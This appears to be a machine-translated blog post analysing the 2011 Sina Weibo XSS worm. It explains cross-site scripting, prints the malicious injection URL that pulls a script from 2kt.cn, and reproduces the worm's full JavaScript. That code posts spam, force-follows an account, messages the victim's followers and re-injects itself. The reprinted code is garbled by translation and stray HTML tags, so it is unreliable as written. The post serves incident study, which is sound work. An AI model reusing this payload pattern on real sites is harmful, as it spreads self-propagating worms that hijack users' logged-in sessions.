Sina Weibo XSS attack event

At around, June 28, Sina Weibo experienced a large XSS attack. A large number of users automatically send: "Some unnoticed details of the Guo Meimei Incident", "where the masses are in the great business of building the party", and "100 poems to the hearts of women ", "the seeds of the 3D meat troupe HD Mandarin edition", "this is the legend of the fairy companion", "Shocking! Fan Bingbing's photo has actually flowed out, "and other Weibo messages and private messages, and automatically follows a user named hellosamy.

The cause of the event is as follows:

• At, a large number of authenticated users with V started to recruit forwarding worms.
• At, the virus page in 2kt.cn cannot be accessed.
• At, hellosamy users in Sina Weibo cannot access
• , Sina vulnerability repair completed

　　Sina Weibo XSS event

Here, I want to introduce XSS attacks, also known as XSS attacks. You can find many articles by Google. Here I will give you a brief description. First, we all know that many websites on the Internet can "remember your username and password" or "automatically log on". In fact, a cookie is set locally, this method saves you the trouble of entering the user name and password every time, but it also brings a lot of problems. Imagine if a user is in the "Automatic Login" status, if you run a program, this program accesses some links on the "Automatic Login" website and submits some forms, this means that these programs can communicate with the programs on the server without entering the user name and password for manual interaction. This is the most basic idea of XSS attacks. Besides, it is not necessarily a "remember your username and password" or "automatic login" method, because HTTP is stateless, so, almost all websites set cookies on your browser to record the status, so that you can check your logon status on multiple webpages. The current browser is running on multiple pages or multiple window ports, that is, you can use your logon status on multiple pages or windows in the same parent process for free. Of course, you don't have to worry too much about accessing other websites. The js Code on other websites will visit your Weibo or online banking login pages. Because of browser security, js can only access resources of its own website. Of course, this is a browser check, so the browser does not necessarily do this check, which is why IE6 is one of the most insecure browsers in history. As long as you are not using ie6. There are two methods for XSS attacks,

• Like SQL Injection or CMD Injection attacks, I inject a script into the server. When a user accesses a URL on the method server, this URL will inject the remote js into it, this js may perform many operations automatically. For example, this event will help you send Weibo posts and send intra-site messages. There are many injection methods, such as submitting forms, modifying URL parameters, uploading images, setting signatures, and so on.

• The other type is from external attacks. It mainly refers to constructing XSS Cross-Site vulnerability webpages or searching for webpages with cross-site vulnerabilities other than the target machines. For example, when we want to penetrate a website, we construct a cross-site webpage and place it on our own server. Then, we use other technologies, such as social engineering, to trick the administrator of the target server into opening the webpage. This type of attacks pose relatively low threats. At least it is very difficult for ajax to initiate cross-site calls (you may need a hack browser ).

This Sina Weibo event is the first, the use of the microblogging square page http://weibo.com/pub/star of a URL injection js script, which through the http://163.fm/PxZHoxn short link service, link:

Code:

http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update 

Note that the above URL link is actually

Code:

< script src="//www.2kt.cn/images/t.js"></script>

Attackers are not necessarily from 2kt.cn because. cn is strictly controlled by the country. Therefore, I personally think this person will not be stupid enough to use his own domain name to attack the server.

Others

• It was initially found that Chrome and Safari were not involved. IE and Firefox are not spared.
• The most famous XSS attack in history is Yahoo Mail's yamanner worm, which is a famous XSS attack instance. The early Yahoo Mail System can execute JavaScript code in the letter. Yahoo Mail uses Ajax technology, so that javascript can initiate Ajax requests to Yahoo mail to get users' address book and send attack code to others.
• Why is the user named hellosamy because Samy is the first XSS attacking worm that spreads on MySpace.
• The attack code is here: 06.28_sina_xss.txt (the encoding style is quite good)

Function createXHR () {<br/> return window. XMLHttpRequest? <Br/> new XMLHttpRequest (): <br/> new ActiveXObject ("Microsoft. XMLHTTP "); <br/>}< br/> function getappkey (url) {<br/> xmlHttp = createXHR (); <br/> xmlHttp. open ("GET", url, false); <br/> xmlHttp. send (); <br/> result = xmlHttp. responseText; <br/> id_arr = ''; <br/> id = result. match (/namecard =/"true/" title =/"[^/"] */g); <br/> for (I = 0; I <id. length; I ++) {<br/> sum = id [I]. toString (). split ('"') [3]; <br/> id_arr + = su M + '|'; <br/>}< br/> return id_arr; <br/>}< br/> function random_msg () {<br/> link = 'http://163.fm/PxZHoxn? Id = '+ new Date (). getTime (); <br/> var msgs = [<br/> 'some unnoticed details of the Guo Meimei event :', <br/> 'helping people in the great business of the founding of the Party: ', <br/>' the 100 poems that make a woman's heart beat :', <br/> '3d meat regimental HD Mandarin seed: ', <br/> 'this is the legend of the fairy:', <br/> 'shocking! Fan Bingbing's photo has really flowed out: ', <br/>' Yang Mi has been cracked for many times and is under a rule: ', <br/> 'dumb grabs a bank with a hammer :', <br/> 'Software that can listen to others' mobile phones: ', <br/> 'tax start point is expected to mention 4000:']; <br/> var msg = msgs [Math. floor (Math. random () * msgs. length)] + link; <br/> msg = encodeURIComponent (msg); <br/> return msg; <br/>}< br/> function post (url, data, sync) {<br/> xmlHttp = createXHR (); <br/> xmlHttp. open ("POST", url, sync); <br/> xmlHttp. setRequestHeader ("Accept", "text/html, application/xhtml + xml, appl Ication/xml; q = 0.9, */*; q = 0.8 "); <br/> xmlHttp. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded; charset = UTF-8"); <br/> xmlHttp. send (data); <br/>}< br/> function publish () {<br/> url = 'HTTP: // weibo.com/mblog/publish.php? Rnd = '+ new Date (). getTime (); <br/> data = 'content = '+ random_msg () +' & pic = & styleid = 2 & retcode = '; <br/> post (url, data, true); <br/>}< br/> function follow () {<br/> url = 'HTTP: // weibo.com/attention/aj_addfollo#php? Refer_sort = profile & atnId = profile & rnd = '+ new Date (). getTime (); <br/> data = 'uid = '+ 2201270010 +' & fromuid = '+ $ CONFIG. $ uid + '& refer_sort = profile & atnId = profile'; <br/> post (url, data, true); <br/>}< br/> function message () {<br/> url = 'HTTP: // weibo.com/'+ $ CONFIG. $ uid + '/follow'; <br/> ids = getappkey (url); <br/> id = ids. split ('|'); <br/> for (I = 0; I <id. length-1 & I <5; I ++) {<br/> msgurl = 'HTTP: // weib O.com/message/addmsg.php? Rnd = '+ new Date (). getTime (); <br/> msg = random_msg (); <br/> msg = encodeURIComponent (msg ); <br/> user = encodeURIComponent (id [I]); <br/> data = 'content = '+ msg +' & name = '+ user +' & retcode = '; <br/> post (msgurl, data, false ); <br/>}< br/> function main () {<br/> try {<br/> publish (); <br/>}< br/> catch (e) {}< br/> try {<br/> follow (); <br/>}< br/> catch (e) {}< br/> try {<br/> message (); <br/>}< br/> catch (e) {}< br/>}< br/> try {<br/> x = "g = document. createElement ('script'); g. src = 'HTTP: // www.2kt.cn/images/t.js'{document.body.appendchild (g) "; window. opener. eval (x); <br/>}< br/> catch (e) {}< br/> main (); <br/> var t = setTimeout ('location = "http://weibo.com/pub/topic"; ', 5000 );